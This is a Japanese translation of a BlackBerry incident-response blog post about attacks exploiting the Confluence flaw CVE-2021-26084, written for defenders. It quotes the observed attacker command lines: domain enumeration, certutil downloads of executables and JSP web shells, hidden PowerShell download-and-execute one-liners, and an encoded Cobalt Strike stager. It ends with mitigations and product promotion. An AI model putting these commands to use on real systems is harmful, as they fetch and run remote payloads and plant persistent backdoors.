ナビゲーションをスキップする
BlackBerry ThreatVector ブログ

ブルーチーム:予防の観点から見た Confluence の脆弱性(CVE-2021-26084)

サービス / 11.19.21 / Tony Lee
Connection network in dark servers data center room storage systems 3D rendering
Connection network in servers data center room storage systems 3D rendering

本ブログ記事は、2021年9月8日に米国で公開されたBlackBerryのブログ記事の抄訳版です。原文はこちらからご覧頂けます。

8月の終わりから9月の初週にかけて、BlackBerry のインシデント対応(IR)チームは、Confluence Server と Confluence Data Center の最近発見された脆弱性の悪用が増加していることを確認しました。この脆弱性には、CVE-2021-26084 の ID 番号が割り当てられています。ここにも、重大な脆弱性が公開システムに影響を及ぼすという最近の傾向がうかがえます。

この脆弱性を突いた攻撃者は、リモートコード実行(RCE)が可能になり、被害者がログインする前にターゲットデバイスでコードを実行することができます。インターネット上にはたくさんの概念実証(POC)エクスプロイトが出回っています。脅威アクターは Web をスキャンして、ネットワークのセキュリティ担当者が軽減の機会を得る前に可能な限り早くペイロードをばらまいています。

この記事では、複数の環境で見られた攻撃者の手法をいくつか明らかにします。たとえば、Certutil や PowerShell を悪用して、感染したシステムとネットワークに関する情報を発見し、追加の永続化メカニズムを導入した事例があります。

 

最も一般的な攻撃者の手法

この脆弱性は Linux® 環境にも影響を及ぼしますが、私たちがこれまでに確認したインシデントは Windows®上で実行されています。当社は、tomcat9.exe プロセスの子プロセスとして作成されたコマンドプロンプトをこれらの事例で確認しました。この親と子の関係を調べることで、多くの関連イベントが明らかになりました。



tomcat9.exe > cmd.exe /c > certutil.exe > powershell.exe > net.exe
BlackBerry のリサーチャーは、よく使われるコマンド群を最初に見つけました。これらのコマンドは、影響を受けるホストのシステムとネットワークに関する情報を列挙するために使用されます。

cmd.exe /c "net user /domain" cmd.exe /c "net time /domain" cmd.exe /c "net group \"domain admins\" /domain"

 

Certutil の悪用

Certutil は、証明書を構成、管理するために Windows の証明書サービスで使用される正規のユーティリティです。このツールは、脅威アクターがさまざまな悪意のある活動を実行するときにも広く利用されています。脅威アクターは、正規の Windows ユーティリティを選択することがよくあります。これらのユーティリティは被害者のシステムにすでに存在し、疑わしいものとして警告される可能性が低いからです。攻撃者のこうした手法は「環境寄生型」(LotL)と呼ばれています。

Confluence のエクスプロイトイベントでは、Web シェルや実行可能ファイルをダウンロードするために Certutil が悪用されました。以下の例は、悪意のあるバイナリファイルをダウンロードするために Certutil がどのように使用されたのかを示しています。


cmd.exe /c "certutil.exe -urlcache -split -f hxxp:///aaaa[.]exe

 

PowerShell の悪用

BlackBerry はまた、PowerShell を使用してコード、スクリプト、実行可能ファイルをダウンロードして実行する事例も発見しました。これらのコマンドの例を以下に示します。


powershell -c "Invoke-WebRequest -uri http://:/hhhh -OutFile iiii[.]exe;./iiii[.]exe" cmd.exe /c "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://:/jjjj'))\"" cmd.exe /c "PoWershElL.exE -eXEc bypASS -noP -WInD HIdDEN -C IeX (NeW-OBjeCt Net.WeBClIeNt).DowNlOAdStRinG(http://:/kkkk.json;)" cmd.exe /c "powershell -w hidden -c (new-object system.net.webclient).downloadfile(http://:/llll.jpg;llll.bat;);start-process llll.bat"

 

永続化メカニズム

脅威アクターは侵害されたホストにバックドアをインストールし、再びエクスプロイトする必要性をなくします。これにより、パッチが適用されてもアクセスが維持されます。

Apache Tomcat は Java Server Page (JSP)ファイルを実行して、Web サーバー自体でサーバー側コードを実行できるため、脅威アクターはこのソフトウェアを悪用して脆弱な Confluence サーバーに Web シェルをインストールしています。これにより、脅威アクターは影響を受けるシステムへの永続的なアクセスを構築できます。Certutil を悪用して Web シェルファイルをダウンロードするコマンドの例には、以下のコードが含まれます。



cmd /c \"cd /d \"\\Program Files\\Atlassian\\Confluence\\confluence\\\"&certutil.exe -urlcache -split -f http:///bbbb[.]jsp images\\themes\\cccc[.]jsp" cmd.exe /c \"certutil.exe -urlcache -split -f http:///dddd[.]jsp confluence/eeee[.]jsp\" cmd.exe /c \"certutil.exe -urlcache -split -f http:///ffff[.]jsp ./confluence/gggg[.]jsp\"

 

場合によっては、脅威アクターは感染したシステムに Cobalt Strike を仕込み、メモリの永続性を構築して、さらなる横展開を段階的に実施しました。Cobalt Strike の展開例の一部を以下に示します。


cmd.exe /c "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlA[redacted]"

 

取るべき措置

最初に このリスト をチェックして、所有するオンプレミスの Confluence Server または Confluence Data Center のバージョンが該当するかどうかを確認します。該当するバージョンを実行している場合、次のステップは修正済みバージョンへのアップグレードです(可能な場合)。アップグレードができない場合は、Atlassian が提供する 一時的な回避策 を実行します。

最後に、Confluence ホストとその周辺環境で侵害の痕跡を調べることが重要です。侵害が起きたときに検知すべき攻撃者の手法をいくつか挙げてきました。ファイルシステム全体を調べて、Web シェルの痕跡がないか確認してください。ここで留意すべきは、攻撃者は非常に小さな Web シェルを使用できることです。たとえば、China Chopper は周囲のファイルに溶け込み、検知を回避することができます。

 

BlackBerry Spark UES Suite および BlackBerry Guard はこれらの攻撃を阻止します

確信が持てないときは、BlackBerry のエキスパートを呼んでフォレンジック分析と セキュリティ侵害評価 を実行してください。BlackBerry のお客様はどうぞご安心ください。AI 駆動の BlackBerry Spark UES Suite と、MDR (Managed Detection & Response)ソリューションである BlackBerry® Guard は、外部接続の継続する脆弱性がもたらすリスクの軽減に十分対応することができます。コアテクノロジーの例を以下に示します。

  • BlackBerry® Protect は、マルウェアの未然防御、アプリケーションやスクリプトの制御、メモリの保護、デバイスポリシーの適用を自動化します。
  • BlackBerry® Optics は、コンテキスト分析エンジン(CAE)ルールを使用してテレメトリを追加することにより、脅威の予防を強化します。次のルールは、脆弱性の悪用を特定するのに効果を発揮しました。
    • Certutil の悪用
    • PowerShell のダウンロード
    • PowerShell のエンコードされたコマンド
    • ワンライナー ML モジュール
    • アカウントの発見

 

攻撃を受けた場合

不幸にも未然の防御が間に合わず、すでに攻撃の被害を受けていると思われる場合は、BlackBerry との既存の関係にかかわらず、当社にご連絡ください

BlackBerry のインシデント対応チーム は、ランサムウェアや APT 攻撃の事例など、さまざまなインシデントの対応/封じ込めサービスの運用に専念する、ワールドクラスのコンサルタントで構成されています。

 

・お問い合わせ:https://www.blackberry.com/ja/jp/forms/enterprise/contact-us

・イベント/セミナー情報:https://www.blackberry.com/ja/jp/events/jp-events-tradeshows

・BlackBerry Japan:https://www.blackberry.com/ja/jp

Tony Lee

About Tony Lee

グローバルサービステクニカルオペレーション担当副社長、BlackBerry

BlackBerryのグローバルサービステクニカルオペレーション担当副社長のTony Leeは、15年余りの専門家としての調査とコンサルティングの経験を通じて情報セキュリティのあらゆる分野に精力的に取り組んでいます。熱心な教育者として、政府、大学、企業、Black Hatなどのカンファレンスをはじめとする、世界中のさまざまな場所で数千人の学生を指導してきました。『Hacking Exposed 7』の寄稿者としてあらゆる機会を利用して知識を共有しているほか、熱心なブロガー、調査担当者、そしてCitrix Security、China Chopper Webシェル、CiscoのSYNFul Knockルーターインプラントなど、幅広いトピックのホワイトペーパーの著者でもあります。長年にわたって、UnBup、Forensic Investigator Splunkアプリ、ホームユーザーからSOCアナリストまで万人向けに設計された拡張可能な脅威インテリジェンスボットフレームワークのCyBotなど、多くのツールをセキュリティコミュニティに提供しています。